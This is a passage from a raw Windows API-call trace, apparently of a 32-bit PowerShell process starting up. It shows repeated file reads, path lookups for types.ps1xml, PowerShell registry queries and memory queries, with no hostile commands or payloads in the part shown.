lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.814] GetLastError () returned 0x0 [0139.814] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.814] GetLastError () returned 0x0 [0139.814] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.814] GetLastError () returned 0x0 [0139.816] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.816] GetLastError () returned 0x0 [0139.816] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.816] GetLastError () returned 0x0 [0139.816] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.816] GetLastError () returned 0x0 [0139.817] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.817] GetLastError () returned 0x0 [0139.817] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.817] GetLastError () returned 0x0 [0139.817] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.817] GetLastError () returned 0x0 [0139.817] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.817] GetLastError () returned 0x0 [0139.817] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.817] GetLastError () returned 0x0 [0139.817] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.818] GetLastError () returned 0x0 [0139.818] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.818] GetLastError () returned 0x0 [0139.818] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.818] GetLastError () returned 0x0 [0139.818] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.818] GetLastError () returned 0x0 [0139.818] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.818] GetLastError () returned 0x0 [0139.818] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.818] GetLastError () returned 0x0 [0139.819] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.819] GetLastError () returned 0x0 [0139.819] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.819] GetLastError () returned 0x0 [0139.821] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.821] GetLastError () returned 0x0 [0139.821] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.821] GetLastError () returned 0x0 [0139.821] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.822] GetLastError () returned 0x0 [0139.822] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.822] GetLastError () returned 0x0 [0139.822] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.822] GetLastError () returned 0x0 [0139.822] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.822] GetLastError () returned 0x0 [0139.822] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.822] GetLastError () returned 0x0 [0139.822] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1000, lpOverlapped=0x0) returned 1 [0139.822] GetLastError () returned 0x0 [0139.822] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x1b4, lpOverlapped=0x0) returned 1 [0139.822] GetLastError () returned 0x0 [0139.822] ReadFile (in: hFile=0x350, lpBuffer=0x2d18478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de834, lpOverlapped=0x0 | out: lpBuffer=0x2d18478*, lpNumberOfBytesRead=0x2de834*=0x0, lpOverlapped=0x0) returned 1 [0139.822] GetLastError () returned 0x0 [0139.823] CloseHandle (hObject=0x350) returned 1 [0139.823] GetLastError () returned 0x0 [0139.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x2de394, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0139.823] GetLastError () returned 0x0 [0139.823] SetErrorMode (uMode=0x1) returned 0x1 [0139.823] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2d38d08 | out: lpFileInformation=0x2d38d08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0139.823] GetLastError () returned 0x0 [0139.823] SetErrorMode (uMode=0x1) returned 0x1 [0139.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x2de360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0139.823] GetLastError () returned 0x0 [0139.823] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de7b8 | out: phkResult=0x2de7b8*=0x350) returned 0x0 [0139.823] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de800, lpData=0x0, lpcbData=0x2de7fc*=0x0 | out: lpType=0x2de800*=0x1, lpData=0x0, lpcbData=0x2de7fc*=0x56) returned 0x0 [0139.823] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de800, lpData=0x3da558, lpcbData=0x2de7fc*=0x56 | out: lpType=0x2de800*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2de7fc*=0x56) returned 0x0 [0139.824] RegCloseKey (hKey=0x350) returned 0x0 [0139.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x2de360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0139.824] GetLastError () returned 0x0 [0139.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x2de2f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0139.824] GetLastError () returned 0x0 [0143.739] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.752] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.754] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.754] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.754] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.755] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.756] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.759] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.772] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.772] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.772] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.772] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.773] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.773] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.773] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.774] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.813] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.818] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.818] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.819] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.819] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.820] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.820] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.821] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.821] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.821] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.821] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.821] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.822] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.822] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.824] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.826] VirtualQuery (in: lpAddress=0x2dd6f8, lpBuffer=0x2de6f8, dwLength=0x1c | out: lpBuffer=0x2de6f8*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.827] VirtualQuery (in: lpAddress=0x2dd6f8, lpBuffer=0x2de6f8, dwLength=0x1c | out: lpBuffer=0x2de6f8*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.827] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.828] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.135] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.135] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.136] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.183] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.187] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.188] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.188] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.188] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.188] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.189] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.189] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.190] VirtualQuery (in: lpAddress=0x2dd6f4, lpBuffer=0x2de6f4, dwLength=0x1c | out: lpBuffer=0x2de6f4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.191] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de87c | out: phkResult=0x2de87c*=0x34c) returned 0x0 [0144.191] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x2de8e4, lpData=0x0, lpcbData=0x2de8e0*=0x0 | out: lpType=0x2de8e4*=0x1, lpData=0x0, lpcbData=0x2de8e0*=0x74) returned 0x0 [0144.191] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x2de8c4, lpData=0x0, lpcbData=0x2de8c0*=0x0 | out: lpType=0x2de8c4*=0x1, lpData=0x0, lpcbData=0x2de8c0*=0x74) returned 0x0 [0144.192] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x2de8c4, lpData=0x3da558, lpcbData=0x2de8c0*=0x74 | out: lpType=0x2de8c4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x2de8c0*=0x74) returned 0x0 [0144.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x2de444, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0144.192] GetLastError () returned 0xcb [0144.192] SetErrorMode (uMode=0x1) returned 0x1 [0144.192] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x2de8c4 | out: lpFileInformation=0x2de8c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0144.192] GetLastError () returned 0xcb [0144.192] SetErrorMode (uMode=0x1) returned 0x1 [0144.196] GetFullPathNameW (in: 